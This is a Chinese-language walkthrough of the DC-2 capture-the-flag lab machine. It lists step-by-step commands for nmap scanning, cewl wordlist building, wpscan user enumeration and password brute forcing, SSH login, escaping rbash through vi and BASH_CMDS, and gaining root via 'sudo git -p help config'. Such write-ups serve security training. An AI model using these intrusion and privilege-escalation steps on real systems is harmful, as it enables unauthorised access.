一、信息收集
1、主机发现
nmap 192.168.236.0/24
2、端口扫描
nmap 192.168.236.130 -p- -A
二、漏洞探测
访问192.168.236.130,URL重定向,在本地hosts文件中添加192.168.236.130 dc-2
在flag1中提示cewl工具,kali自带,把密码跑一下
cewl http://dc-2 -w passwd.txt
目录扫描
发现WordPress登录页面
枚举用户名,admin、jerry、tom
wpscan --url http://dc-2/ -e u
爆破账号密码
wpscan --url http://dc-2/ -U user.txt -P passwd.txt
爆破出两组数据 jerry:adipiscing,tom:parturient,登录
flag2中提示WordPress中没有可利用点
三、GetShell
在端口扫描时,发现7744端口开放,尝试连接
ssh tom@192.168.236.130 -p 7744
四、提权
发现flag3.txt,但是命令不可用
compgen -c //查看可以使用的指令
使用vi查看flag3.txt内容
提示提权后再看jerry和su
vi flag3.txt
输入
:set shell=/bin/bash
:shell
部分权限提升,返回上级目录,发现jerry,进入目录发现flag4
查看flag4文件
说没有提示,但是最后一句git outta here,应该在提示使用git,但是sudo -l无法查看,不确定
绕过rbash,切到jerry
export -p //查看环境变量
BASH_CMDS[a]=/bin/sh;a //把/bin/sh给a
/bin/bash
export PATH=$PATH:/bin/ //添加环境变量
export PATH=$PATH:/usr/bin //添加环境变量
查看当前权限
sudo -l
git拥有root权限,执行命令,提权成功
sudo git -p help config
!/bin/sh
切到root家目录,查看最后一个flag文件